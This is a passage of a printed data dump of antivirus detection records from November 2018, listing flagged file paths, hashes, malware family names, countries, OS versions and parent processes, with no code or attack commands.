  Row(detection=Row(filename='d18271e25cd51cfe33cd8ef37ea61abc79f6b851cfc741bf4d932706a37d3e56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\D18271E25CD51CFE33CD8EF37EA61ABC79F6B851CFC741BF4D932706A37D3E56', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d18271e25cd51cfe33cd8ef37ea61abc79f6b851cfc741bf4d932706a37d3e56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:10:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mansion.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\MANSION\\MANSION.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.dll', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230531-d58caadb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_394e3c36\\AVSCAN-20181102-230350-C43A23EB\\AVSCAN-20181102-230531-D58CAADB', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:35:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d54a', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d54a', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clif080r.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Intelligix\\Netix Retail\\Modules\\172.16.250.10\\CLIF080R.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='ebad2f54327c1c1d9205662e7b124e7fbb35ff373721599d9882b8a45856c8a5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131714-2d4cd7a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131714-2D4CD7A1', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='teracopydisable.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\TeraCopyDisable.exe", filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\5hkewv2tgde\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083929-9bf47d8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-083929-9BF47D8F', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='eb8f40f6ae2bed7c96b26378e7eb0e1306b068b1b6e2ca2308c805920bb0bc81', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010218-622a5cf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d23a290a\\AVSCAN-20181102-010133-5985666A\\AVSCAN-20181102-010218-622A5CF9', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:02:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274030001.scr', filepath='F:\\scan-peta-wb-sp2010\\3274030\\3274030001\\3274030001.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s98j26jjajo31h.x64.dll#bbe06351926c83e8', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\217\\BAESTSAVEOFOERYOU\\S98J26JJAJO31h.x64.dll#BBE06351926C83E8', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='b96935e30723eb52c1d0b2b116e0598e120b8d8d2362c5360253cbd0dcf3fa1a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\E2DD52BF80724E44332A5583EE930B228C00F50B77B25AE92B6623C8F14494F4', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:22:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210626-656fcaf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5129c324\\AVSCAN-20181104-210448-584E1AA5\\AVSCAN-20181104-210626-656FCAF0', filesize=320000, name='TR/AD.CoinMiner.xxwsa.#M1.#R1'), hash='ced46d99ebf179274add883a3e6a7ad3c3ecf4cd739ea540de0f7a8c9bd3c44b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:06:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T04:37:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-112723-f83ed525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36bb77ec\\AVSCAN-20181104-112657-F48AA8D3\\AVSCAN-20181104-112723-F83ED525', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T08:27:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214842-21863871', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214842-21863871', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203933-1e7ab2ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203933-1E7AB2AC', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:30:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290907', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290907', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kgftbz_posemod.exe', filepath='c:\\users\\X\\downloads\\play as megami mod by alexgaming\\kgftbz_posemod.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:00:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='email sender.exe', filepath='F:\\هام\\Email Sender Pro V0.2\\Email Sender.exe', filesize=576000, name='W32/Neshta.A.#M1.#R1'), hash='eac8f7a07044454e7584d70d5c09e77a41afe39a659eed19311fa88b273d4061', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:24:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='edfcb205ab7fc119363ecc2bff838fef9202ed480f57dff1ebbade65c635613a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EDFCB205AB7FC119363ECC2BFF838FEF9202ED480F57DFF1EBBADE65C635613A', filesize=192000, name='TR/Crypt.XPACK.Gen.#M300.#R1021'), hash='edfcb205ab7fc119363ecc2bff838fef9202ed480f57dff1ebbade65c635613a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:07:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='afdwufiohelper.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\afdwuFIOHelper.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='e224002d8723466e1666733d7bef676ccd79dabffd1031bfea5adee1d879e877', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultraiso.exe', filepath='K:\\HBCD\\Programs\\UltraISO.exe', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:03Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:12:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD5725-D41B-FA55-3028-3863E6DB5FB1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (5).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugin.dll', filepath='C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe178_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe178 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T12:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192102-c654f922', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-191829-FEAFD4A0\\AVSCAN-20181102-192102-C654F922', filesize=192000, name='TR/Dropper.A.1801.#M1.#R1'), hash='717ffdf06b37d1dd5b81cdb3a3d14cfd1742d8d53cb41a0f348afaabdce884d7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp1221605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\aTube_Catcher_1857970943.exe', parentsize=2610712, timestamp='2018-11-02T14:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\USERS\\X\\APPDATA\\ROAMING\\MICROSOFT\\WINDOWS\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:30:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='4f87dd497d63f80ac6303d83520c10a3398e71e8043d17870dc335f6857734dd', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2012.pif', filepath='D:\\DOKUMENKU\\GABUNG KREDIT\\2012\\2012.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tabungan gabung des 11.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2011\\NOM TABUNGAN GABUNG DES 11\\TABUNGAN GABUNG DES 11.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:19Z'), dt=datetime.date(2018, 11, 2)),
